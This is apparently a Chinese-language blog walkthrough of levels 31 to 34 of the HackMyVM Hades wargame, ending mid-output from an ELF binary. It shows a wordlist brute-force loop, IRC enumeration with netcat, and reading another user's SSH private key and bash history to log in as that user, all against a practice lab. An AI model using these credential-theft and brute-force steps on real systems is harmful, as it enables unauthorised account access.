{"id":727,"date":"2024-07-06T16:36:00","date_gmt":"2024-07-06T08:36:00","guid":{"rendered":"http:\/\/162.14.82.114\/?p=727"},"modified":"2024-07-06T16:36:00","modified_gmt":"2024-07-06T08:36:00","slug":"hmvlabs-hades31-40","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/727\/07\/06\/2024\/","title":{"rendered":"HMVLabs-Hades(31-40)"},"content":{"rendered":"<h2>31 halcyon<\/h2>\n<pre><code class=\"language-bash\">halcyon@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root    halcyon 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root    4096 Apr  5 06:36 ..\n-rw-r--r-- 1 halcyon halcyon  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 halcyon halcyon 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 halcyon halcyon  807 Apr 23  2023 .profile\n-rw-r----- 1 root    halcyon   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root    halcyon  252 Apr  5 06:36 mission.txt\nhalcyon@hades:~$ grep -ra &#039;\\^*\\^&#039; .\n.\/flagz.txt:^YBkkiwOiBVdzLnxXPdU^\nhalcyon@hades:~$ cat mission.txt \n################\n# MISSION 0x31 #\n################\n\n## EN ##\nThe user hebe has one &#039;magicword&#039; to get her password using http:\/\/localhost\/req.php \n\n## ES ##\nLa usuaria hebe tiene una &#039;magicword&#039; para obtener su password usando http:\/\/localhost\/req.php\nhalcyon@hades:~$ curl -is http:\/\/localhost\/req.php\nHTTP\/1.1 200 OK\nServer: nginx\/1.22.1\nDate: Wed, 03 Jul 2024 14:32:42 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\n\nNO...\nhalcyon@hades:~$ curl -is http:\/\/localhost\/req.php?magicword=whoami\nHTTP\/1.1 200 OK\nServer: nginx\/1.22.1\nDate: Wed, 03 Jul 2024 14:33:59 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\n\nNO...\n<\/code><\/pre>\n<p>\u4f7f\u7528\u522b\u4eba\u4f20\u4e0a\u53bb\u7684\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff0c\u6216\u8005\u4f20rockyou.txt\u524d 1000 \u4e2a\u5355\u8bcd\u8fdb\u884c\u7206\u7834:<\/p>\n<pre><code class=\"language-bash\">halcyon@hades:~$ for i in $(cat \/var\/tmp\/31\/123.txt); do curl -s http:\/\/localhost\/req.php?magicword=$i; done | grep -v &quot;NO...&quot; | sed &#039;\/^$\/d&#039;\ntOlbuBLjFWntVDNmjHIG <\/code><\/pre>\n<ul>\n<li>\/^$\/ \u662f\u4e00\u4e2a\u6b63\u5219\u8868\u8fbe\u5f0f\u6a21\u5f0f\uff0c\u7528\u4e8e\u5339\u914d\u7a7a\u767d\u884c\u3002\n<ul>\n<li>^ \u8868\u793a\u884c\u7684\u5f00\u59cb\u3002 <\/li>\n<li>$ \u8868\u793a\u884c\u7684\u7ed3\u675f\u3002 <\/li>\n<\/ul>\n<\/li>\n<li>^$ \u7ed3\u5408\u8d77\u6765\u5c31\u5339\u914d\u4e86\u4e00\u4e2a\u6ca1\u6709\u4efb\u4f55\u5b57\u7b26\u7684\u884c\uff0c\u5373\u7a7a\u767d\u884c\u3002<\/li>\n<li>d \u662f\u4e00\u4e2a sed \u547d\u4ee4\uff0c\u8868\u793a\u5220\u9664\u5339\u914d\u5230\u7684\u884c\u3002<\/li>\n<\/ul>\n<h2>32 hebe<\/h2>\n<pre><code class=\"language-bash\">hebe@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root hebe 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root 4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hebe hebe  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hebe hebe 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hebe hebe  807 Apr 23  2023 .profile\n-rw-r----- 1 root hebe   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root hebe  232 Apr  5 06:36 mission.txt\nhebe@hades:~$ cat mission.txt \n################\n# MISSION 0x32 #\n################\n\n## EN ##\nUser hera refuses to use Discord, she prefer an older and open source service.\n\n## ES ##\nLa usuaria hera se niega a usar Discord, prefiere un medio mas antiguo y abierto.\nhebe@hades:~$ cat flagz.txt \n^BAWnwGCghvcBbbRcZVd^\nhebe@hades:~$ sudo -l\n[sudo] password for hebe: \nSorry, user hebe may not run sudo on hades.\nhebe@hades:~$ ss -atlup\n-bash: \/usr\/bin\/ss: Permission denied\nhebe@hades:~$ \/var\/tmp\/busybox netstat -atlup\nnetstat: can&#039;t scan \/proc - are you root?\nActive Internet connections (servers and established)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name\ntcp        0      0 localhost:38595         0.0.0.0:*               LISTEN      -\ntcp        0      0 localhost:ircd          0.0.0.0:*               LISTEN      -\ntcp        0      0 0.0.0.0:http            0.0.0.0:*               LISTEN      -\ntcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      -\ntcp        0    468 hades:ssh               218.201.30.54:13155     ESTABLISHED -\ntcp        0      0 localhost:47738         localhost:ssh           ESTABLISHED -\ntcp        0      0 localhost:ssh           localhost:47738         ESTABLISHED -\ntcp        0      0 :::1965                 :::*                    LISTEN      -\ntcp        0      0 :::http                 :::*                    LISTEN      -\ntcp        0      0 :::ftp                  :::*                    LISTEN      -\ntcp        0      0 :::ssh                  :::*                    LISTEN      -\nudp        0      0 localhost:56483         0.0.0.0:*                           -\nudp        0      0 0.0.0.0:44595           0.0.0.0:*                           -\nudp        0      0 0.0.0.0:55168           0.0.0.0:*                           -\nhebe@hades:~$ \/var\/tmp\/busybox netstat -tlnup\nnetstat: can&#039;t scan \/proc - are you root?\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 127.0.0.11:38595        0.0.0.0:*               LISTEN      -\ntcp        0      0 127.0.0.1:6667          0.0.0.0:*               LISTEN      -\ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -\ntcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -\ntcp        0      0 :::1965                 :::*                    LISTEN      -\ntcp        0      0 :::80                   :::*                    LISTEN      -\ntcp        0      0 :::21                   :::*                    LISTEN      -\ntcp        0      0 :::22                   :::*                    LISTEN      -\nudp        0      0 127.0.0.11:56483        0.0.0.0:*                           -\nudp        0      0 0.0.0.0:44595           0.0.0.0:*                           -\nudp        0      0 0.0.0.0:55168           0.0.0.0:*                           -<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2a\u901a\u8baf\u7684<br \/>\nIRCd\uff08Internet Relay Chat Daemon\uff09\u662f\u4e92\u8054\u7f51\u4e2d\u7ee7\u804a\u5929\u534f\u8bae\uff08IRC\uff09\u7684\u5b88\u62a4\u8fdb\u7a0b\u6216\u670d\u52a1\u5668\u8f6f\u4ef6\uff0c\u5b83\u5141\u8bb8\u7528\u6237\u901a\u8fc7\u7f51\u7edc\u8fdb\u884c\u5b9e\u65f6\u804a\u5929\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff0c\u53ef\u4ee5\u53c2\u8003:<a href=\"https:\/\/book.hacktricks.xyz\/v\/cn\/network-services-pentesting\/pentesting-irc\">https:\/\/book.hacktricks.xyz\/v\/cn\/network-services-pentesting\/pentesting-irc<\/a><\/p>\n<pre><code class=\"language-bash\">hebe@hades:~$ \/var\/tmp\/busybox nc localhost:6667\n:hades.hmv NOTICE * :*** Looking up your hostname...\n:hades.hmv NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (127.0.0.1) instead.\nUSER ran213eqdw123 0 * ran213eqdw123\nNICK ran213eqdw123\n:hades.hmv 001 ran213eqdw123 :Welcome to the Devilnet IRC Network ran213eqdw123!ran213eqdw@127.0.0.1\n:hades.hmv 002 ran213eqdw123 :Your host is hades.hmv, running version InspIRCd-3\n:hades.hmv 003 ran213eqdw123 :This server was created 20:29:01 Jun 06 2024\n:hades.hmv 004 ran213eqdw123 hades.hmv InspIRCd-3 iosw Pbiklmnopstv :bklov\n:hades.hmv 005 ran213eqdw123 AWAYLEN=200 CASEMAPPING=rfc1459 CHANLIMIT=#:20 CHANMODES=b,k,l,Pimnpst CHANNELLEN=64 CHANTYPES=# ELIST=CMNTU HOSTLEN=64 KEYLEN=32 KICKLEN=255 LINELEN=512 MAXLIST=b:100 :are supported by this server\n:hades.hmv 005 ran213eqdw123 MAXTARGETS=20 MODES=20 NAMELEN=128 NETWORK=Devilnet NICKLEN=30 PREFIX=(ov)@+ SAFELIST STATUSMSG=@+ TOPICLEN=307 USERLEN=10 USERMODES=,,s,iow WHOX :are supported by this server\n:hades.hmv 251 ran213eqdw123 :There are 0 users and 0 invisible on 1 servers\n:hades.hmv 253 ran213eqdw123 1 :unknown connections\n:hades.hmv 254 ran213eqdw123 1 :channels formed\n:hades.hmv 255 ran213eqdw123 :I have 0 clients and 0 servers\n:hades.hmv 265 ran213eqdw123 :Current local users: 0  Max: 3\n:hades.hmv 266 ran213eqdw123 :Current global users: 0  Max: 3\n:hades.hmv 422 ran213eqdw123 :Message of the day file is missing.\nLIST\n:hades.hmv 321 ran213eqdw123 Channel :Users Name\n:hades.hmv 322 ran213eqdw123 #channel666 0 :[+Pnt] Welcome hacker! Take it: JzpyRXRzWoHKZwgWzleM\n:hades.hmv 323 ran213eqdw123 :End of channel list.<\/code><\/pre>\n<p>\u9664\u6b64\u4e4b\u5916\u5176\u4ed6\u547d\u4ee4\u4e5f\u5c1d\u8bd5\u4e86\uff0c\u4f46\u662f\u6ca1\u6709\u5565\u6709\u7528\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">HELP\n:hades.hmv 421 patrick HELP :Unknown command\nVERSION\n:hades.hmv 351 patrick InspIRCd-3. hades.hmv :\n:hades.hmv 005 patrick AWAYLEN=200 CASEMAPPING=rfc1459 CHANLIMIT=#:20 CHANMODES=b,k,l,Pimnpst CHANNELLEN=64 CHANTYPES=# ELIST=CMNTU HOSTLEN=64 KEYLEN=32 KICKLEN=255 LINELEN=512 MAXLIST=b:100 :are supported by this server\n:hades.hmv 005 patrick MAXTARGETS=20 MODES=20 NAMELEN=128 NETWORK=Devilnet NICKLEN=30 PREFIX=(ov)@+ SAFELIST STATUSMSG=@+ TOPICLEN=307 USERLEN=10 USERMODES=,,s,iow WHOX :are supported by this server\nHELP\n:hades.hmv 421 patrick HELP :Unknown command\nINFO\n:hades.hmv 371 patrick :                   -\/\\- InspIRCd -\\\/-\n:hades.hmv 371 patrick :                 November 2002 - Present\n:hades.hmv 371 patrick :\n:hades.hmv 371 patrick :Core Developers:\n:hades.hmv 371 patrick :    Matt Schatz,            genius3000, &lt;genius3000@g3k.solutions&gt;\n:hades.hmv 371 patrick :    Sadie Powell,           SadieCat,   &lt;sadie@witchery.services&gt;\n:hades.hmv 371 patrick :\n:hades.hmv 371 patrick :Former Developers:\n:hades.hmv 371 patrick :    Attila Molnar,          Attila,     &lt;attilamolnar@hush.com&gt;\n:hades.hmv 371 patrick :    Daniel De Graaf,        danieldg,   &lt;danieldg@inspircd.org&gt;\n:hades.hmv 371 patrick :    Dennis Friis,           peavey,     &lt;peavey@inspircd.org&gt;\n:hades.hmv 371 patrick :    John Brooks,            Special,    &lt;special@inspircd.org&gt;\n:hades.hmv 371 patrick :    Matt Smith,             dz,         &lt;dz@inspircd.org&gt;\n:hades.hmv 371 patrick :    Oliver Lupton,          Om,         &lt;om@inspircd.org&gt;\n:hades.hmv 371 patrick :    Thomas Stagner,         aquanight,  &lt;aquanight@inspircd.org&gt;\n:hades.hmv 371 patrick :    Uli Schlachter,         psychon,    &lt;psychon@inspircd.org&gt;\n:hades.hmv 371 patrick :\n:hades.hmv 371 patrick :Founding Developers:\n:hades.hmv 371 patrick :    Craig Edwards,          Brain,      &lt;brain@inspircd.org&gt;\n:hades.hmv 371 patrick :    Craig McLure,           Craig,      &lt;craig@inspircd.org&gt;\n:hades.hmv 371 patrick :    Robin Burchell,         w00t,       &lt;w00t@inspircd.org&gt;\n:hades.hmv 371 patrick :\n:hades.hmv 371 patrick :Active Contributors:\n:hades.hmv 371 patrick :   Adam            progval         Robby\n:hades.hmv 371 patrick :\n:hades.hmv 371 patrick :Former Contributors:\n:hades.hmv 371 patrick :   Adremelech      Ankit           AnMaster        Bricker\n:hades.hmv 371 patrick :   BuildSmart      Burlex          CC              ChrisTX\n:hades.hmv 371 patrick :   Dan             djGrrr          dmb             eggy\n:hades.hmv 371 patrick :   fraggeln        GreenReaper     HiroP           jackmcbarn\n:hades.hmv 371 patrick :   jamie           Jason           jilles          John2\n:hades.hmv 371 patrick :   kaniini         LeaChim         linuxdaemon     MacGyver\n:hades.hmv 371 patrick :   majic           Namegduf        owine           Phoenix\n:hades.hmv 371 patrick :   pippijn         praetorian      Quension        satmd\n:hades.hmv 371 patrick :   Shawn           Sheogorath      Shutter         skenmy\n:hades.hmv 371 patrick :   Skip            Stskeeps        Taros           ThaPrince\n:hades.hmv 371 patrick :   Thunderhacker   typobox43       Zaba\n:hades.hmv 371 patrick :\n:hades.hmv 371 patrick :Thanks To:\n:hades.hmv 371 patrick :   Asmo            Brik            dan-            Duck\n:hades.hmv 371 patrick :   jwheare         prawnsalad\n:hades.hmv 371 patrick :\n:hades.hmv 371 patrick : Best experienced with an IRC client\n:hades.hmv 374 patrick :End of \/INFO list\nLINKS\n:hades.hmv 364 patrick hades.hmv hades.hmv :0 Devil IRC Server\n:hades.hmv 365 patrick * :End of \/LINKS list.\nHELPOP USERCMDS\n:hades.hmv 421 patrick HELPOP :Unknown command\nADMIN\n:hades.hmv 256 patrick hades.hmv :Administrative info\n:hades.hmv 257 patrick :Name: Devil\n:hades.hmv 258 patrick :Nickname: Devil\n:hades.hmv 259 patrick :Email: root@localhost\nUSERS\n:hades.hmv 446 patrick :USERS has been disabled\nTIME\n:hades.hmv 391 patrick hades.hmv :Wed Jul 03 2024 15:08:12\nSTATS a\n:hades.hmv 481 patrick :Permission Denied - STATS a requires the servers\/auspex priv.\nNAMES \n:hades.hmv 366 patrick * :End of \/NAMES list.<\/code><\/pre>\n<h2>33 hera<\/h2>\n<pre><code class=\"language-bash\">hera@hades:~$ ls -la\ntotal 40\ndrwxr-x--- 3 root hera 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root 4096 Apr  5 06:36 ..\n-rw-r----- 1 root hera  127 Apr  5 06:36 .bash_history\n-rw-r--r-- 1 hera hera  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hera hera 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hera hera  807 Apr 23  2023 .profile\ndrwxr-xr-x 2 root root 4096 Apr  5 06:36 .ssh\n-rw-r----- 1 root hera   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root hera  182 Apr  5 06:36 mission.txt\nhera@hades:~$ grep -ra &#039;\\^*\\^&#039; .\n.\/.bash_history:^LVFcQoSJeZgUltXJKnpZ^\n.\/flagz.txt:^GaIAyNGsSRYClSuzVLX^\nhera@hades:~$ cat mission.txt \n################\n# MISSION 0x33 #\n################\n\n## EN ##\nUser hermione would like to know what hera was doing.\n\n## ES ##\nA la usuaria hermione le gustaria saber que hacia hera.\nhera@hades:~$ cd .ssh\nhera@hades:~\/.ssh$ ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Apr  5 06:36 .\ndrwxr-x--- 3 root hera 4096 Apr  5 06:36 ..\n-rw-r----- 1 root hera  568 Apr  5 06:36 authorized_keys\n-rw-r----- 1 root hera 2590 Apr  5 06:36 id_rsa\nhera@hades:~\/.ssh$ cat authorized_keys \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHnkVd725zQHWzxW8JJFcTlmQRh2nQGEIiwsZo5dz+C99HqV9jwhryrJ6oucxjlwLatA5Fn270JFTdwHxaqFHQxHRHQBJoApbsVF3zpvhH5a+Y5GoDKToNDKU63pCMgZtdFKPC0+1Yr3D0TO\n1ijaZya9ne9mnY20dFFVfGH2sye95C+uiDO1XPmhntqRkj74l6O6I5YqauCjEbb2G4WE5Qp1hw\/D10Tul0gCCj9FT\/Y4dSgFjzefRxT9JN1927NKmaNCuCfIs8vXeq6Z+wYzF+Obh6eFK4upLvG\/P1w4fAyUZZb4LhtdFebhb1N3fjX9XbZtPR\n010X8XMbzh6Q53iGifb9rgyFGcGGOTv0OQPCOtWsV+JvmCZR36wCbWE7t7UT9Mmt\/zhnYzwhAoGbZX7WaieWS\/W8kCvMzZzLbiq2mKOJ9obgFATvaKPc\/8eValOhif1wFrbvvuQyAkuFkPMSFffjPxAU7U54L3DlypgTo3oS33X1pPvD8kfINZRcRSk= hera@hades.hmv\nhera@hades:~\/.ssh$ cat id_rsa \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAx55FXe9uc0B1s8VvCSRXE5ZkEYdp0BhCIsLGaOXc\/gvfR6lfY8Ia\n8qyeqLnMY5cC2rQORZ9u9CRU3cB8WqhR0MR0R0ASaAKW7FRd86b4R+WvmORqAyk6DQylOt\n6QjIGbXRSjwtPtWK9w9EztYo2mcmvZ3vZp2NtHRRVXxh9rMnveQvrogztVz5oZ7akZI++J\nejuiOWKmrgoxG29huFhOUKdYcPw9dE7pdIAgo\/RU\/2OHUoBY83n0cU\/STdfduzSpmjQrgn\nyLPL13qumfsGMxfjm4enhSuLqS7xvz9cOHwMlGWW+C4bXRXm4W9Td341\/V22bT0dNdF\/Fz\nG84ekOd4hon2\/a4MhRnBhjk79DkDwjrVrFfib5gmUd+sAm1hO7e1E\/TJrf84Z2M8IQKBm2\nV+1monlkv1vJArzM2cy24qtpijifaG4BQE72ij3P\/HlWpToYn9cBa2777kMgJLhZDzEhX3\n4z8QFO1OeC9w5cqYE6N6Et919aT7w\/JHyDWUXEUpAAAFgCnyEcUp8hHFAAAAB3NzaC1yc2\nEAAAGBAMeeRV3vbnNAdbPFbwkkVxOWZBGHadAYQiLCxmjl3P4L30epX2PCGvKsnqi5zGOX\nAtq0DkWfbvQkVN3AfFqoUdDEdEdAEmgCluxUXfOm+Eflr5jkagMpOg0MpTrekIyBm10Uo8\nLT7VivcPRM7WKNpnJr2d72adjbR0UVV8YfazJ73kL66IM7Vc+aGe2pGSPviXo7ojlipq4K\nMRtvYbhYTlCnWHD8PXRO6XSAIKP0VP9jh1KAWPN59HFP0k3X3bs0qZo0K4J8izy9d6rpn7\nBjMX45uHp4Uri6ku8b8\/XDh8DJRllvguG10V5uFvU3d+Nf1dtm09HTXRfxcxvOHpDneIaJ\n9v2uDIUZwYY5O\/Q5A8I61axX4m+YJlHfrAJtYTu3tRP0ya3\/OGdjPCECgZtlftZqJ5ZL9b\nyQK8zNnMtuKraYo4n2huAUBO9oo9z\/x5VqU6GJ\/XAWtu++5DICS4WQ8xIV9+M\/EBTtTngv\ncOXKmBOjehLfdfWk+8PyR8g1lFxFKQAAAAMBAAEAAAGAfLX0wGsFphtvbZC7fgqmHCao\/g\nqLoOaG6xCkxIRXPKBOLocygTCThWky9ladytpdfiVfhT\/GIeFQ4\/mNt1XRR4x02M6+sRxt\nDdjnmYGHO+PTgMGzOaZYDi8IS28g\/6c5WT270cx1TCLPftFQvXGhu3qF8zYfisv0CsT6wV\nx\/rFqW0WHQQaygP8MWz9QFUN4mFaeMAi4P1Eupwmojsvf4dYsXRf9QpYlncNFbkxLix2t2\n76Qf7n0Sqngj+14RuRN8h8bGJSfTS5oUI6rY\/3+QcmACjp7Sm784HwZPmLTWig5MrIsVBq\nY35pmDO7YbIZ66Pi327dC\/JwuBn1pVMuxsoUOl3mZdRCUuUFdCD3gyxMU88vHEBq+SU9rO\nDxsNauBPkEqJk9E24ElkkdkJ0zzirrsrs4R0TbyJqVS80\/Witt7nG9jxb5NWbtp6c1Utr2\nO9fnVv2OF7xvpMk81hJFOCkfHZF2uWOFC9Ey6rH80VBS6VocF6cy3jTK1Mq9sqZMrBAAAA\nwBjxlJnsFonnKdWvaYJ5oVWZINRghBOYBQe3TzpneHivPLevivVz3ABGxzKcPCP2qHVELo\n8gxoMEVqkL+RSaVTM6xoVVYBNoN8bb2nUnXk8IZtFIYhnWzVqfQ4+VNFcDbWSE0SIG0my7\nlOUyX6W7a5xWzo6TitAtKKRcKsbMTv3UuVDoyvOZPmFiReCKfsRA3KIWNT5OXA6anjON03\ndZkhrBUWc6izs5z\/4bVMFFMoV4cRgoSCQCqHZo7bklFWNjxAAAAMEA5nCSZXESZUVLyajK\nq0oUa\/gDPrFVnZm7Gln3TVHr96hcMNHUTAhPVWfWwg98MH+O5IjbTW03ZcTP\/LoJV8Xy3O\nWC9NY4lb7BEsja5sYA35g0xUKvQ0DaNdQeMEkZ4pLi3i17EbFtnDGlQxRe1nUPNgRtEx5z\nfk9axW6yqPdUR8S0MufFW82VGjIXvEEXJD44NlXrjUGbBzK24q6VAkCBH1L5qiC\/KfFBLO\nW1gnTsS8AUjWF\/0b4JL1D+HiVdWvq3AAAAwQDdwoK6606A87imIvD3VtaIGY+6N9M5Oodp\nICHg8Cml4nK+hqnFoE\/V5UbFDgfBUfKM+XMXaJEwdQLkFKeY9U7BczB+0A1KrQS31LQK+\/\nNl7792pZzcll2YT8THx91FDNi1dx0zmHRZv2oURDJMc0AJDTqSFSZ+X3t1bHs8qLckfR0X\nO32JcoQ6JZUlJh+Okyq2A6lbEjQqPDk59NhQw\/J24ryKHu5a4oIdfynXOofAqbTZrjQ8Qn\nFdNGMEWYEiXx8AAAALdGVzdGVAZGViMTE=\n-----END OPENSSH PRIVATE KEY-----\n<\/code><\/pre>\n<p>\u62f7\u5230\u672c\u5730\uff0c\u53d1\u73b0\u662f\u53ef\u4ee5\u8fdb\u884c\u767b\u5f55\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">hgbe02@pwn:~\/temp$ chmod 600 id_rsa\nhgbe02@pwn:~\/temp$ ssh -i id_rsa hera@hades.hackmyvm.eu -p 6666\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &amp;          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nLinux hades 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &amp;          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nLast login: Wed Jul  3 15:09:59 2024 from 127.0.0.1\nhera@hades:~$<\/code><\/pre>\n<p>\u63a5\u7740\u4fe1\u606f\u641c\u96c6:<\/p>\n<pre><code class=\"language-bash\">hera@hades:~\/.ssh$ cd ..\nhera@hades:~$ cat .bash_history \n\nls\nps\nsudo -u hermione bash\ncp \/etc \/etc2\n^LVFcQoSJeZgUltXJKnpZ^\nls\nid\ncat \/usr\/hera\nrm \/usr\/hera\nwhoami\nzip -R etc.zip \/etc\nhera@hades:~$ cat \/usr\/hera\nvzhOebSSplFoXPKxwtqU\nhera@hades:~$ find \/ -name etc.zip 2&gt;\/dev\/null<\/code><\/pre>\n<h2>34 hermione<\/h2>\n<pre><code class=\"language-bash\">hermione@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 1 root     hermione  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root     root      4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hermione hermione   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hermione hermione  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hermione hermione   807 Apr 23  2023 .profile\n-rwxrwxrwx 1 hermione hermione 16056 Apr  5 06:36 beastgroup\n-rw-r----- 1 root     hermione    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root     hermione   158 Apr  5 06:36 mission.txt\nhermione@hades:~$ grep -ra &#039;\\^*\\^&#039; .\n.\/flagz.txt:^dLcEkLNgdDvOlxtPhjh^\n@@@@\ufffd\ufffd\ufffd\ufffd\ufffd   $$\ufffd-\ufffd=\ufffd=X`\ufffd-\ufffd=\ufffd=\ufffd888 XXXDDS\ufffdtd888 P\ufffdtdL L L ,,Q\ufffdtdR\ufffdtd\ufffd-\ufffd=\ufffd=00\/lib64\/ld-linux-x86-64.so.2GNU\ufffd\ufffdGNU&#039;\ufffd`\ufffd=&gt;A\ufffd\u0462\ufffd\ufffdh\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdPGN\ufffde\ufffdmV .r &#039;\ufffd &quot;puts__libc_start_main__cxa_finalizegetgidprintflibc.so.6GLIBC_2.2.5GLIBC_2.34_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable5u\u2e2ei    ?\ufffd\ufffd\ufffdK\ufffdP\ufffd  @\ufffd?\ufffd?\ufffd?\ufffd?\ufffd@@H\ufffdH\ufffd\ufffd\/H\ufffd\ufffdt\ufffd\ufffdH\ufffd\ufffd\ufffd5\ufffd\/\ufffd%\ufffd\/@\ufffd%\ufffd\/h\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd\/h\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd\/\/u+UH\ufffd=\ufffd.H\ufffd\ufffdt\ufffdI\ufffd\ufffd^H\ufffd\ufffdH\ufffd\ufffd\ufffdPTE1\ufffd1\ufffdH\ufffd=\ufffd\ufffd\/\/\ufffdf.\ufffd@H\ufffd=\ufffd\/H\ufffdz\/H9\ufffdtH\ufffd\/H\ufffd\ufffdt        \ufffd\ufffd\ufffd\ufffd\ufffdH\ufffd=Q\/H\ufffd5J\/H)\ufffdH\ufffd\ufffdH\ufffd\ufffd?H\ufffd\ufffdH\ufffdH\ufffd\ufffdtH\ufffd\ufffd.H\ufffd\ufffd\ufffd\ufffdfD\ufffd\ufffd\ufffd\ufffd\ufffd=\n             H\ufffd=\ufffd.\ufffd)\ufffd\ufffd\ufffd\ufffdd\ufffd\ufffd\ufffd\ufffd\ufffd.]\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffd\ufffd\ufffdUH\ufffd\ufffdH\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdE\ufffd\ufffd}\ufffd\n.\/beastgroup:\ufffd\n              \ufffd?H@\ufffd     \ufffd\ufffd\ufffd\ufffd\ufffd\ufffdoP\ufffd\ufffd\ufffdo\ufffd\ufffd\ufffdo&lt;\ufffd\ufffd\ufffdo\ufffd=6FV @GCC: (Debian 12.2.0-14) 12.2.0\ufffd\ufffd    | \ufffd\ufffd\ufffd 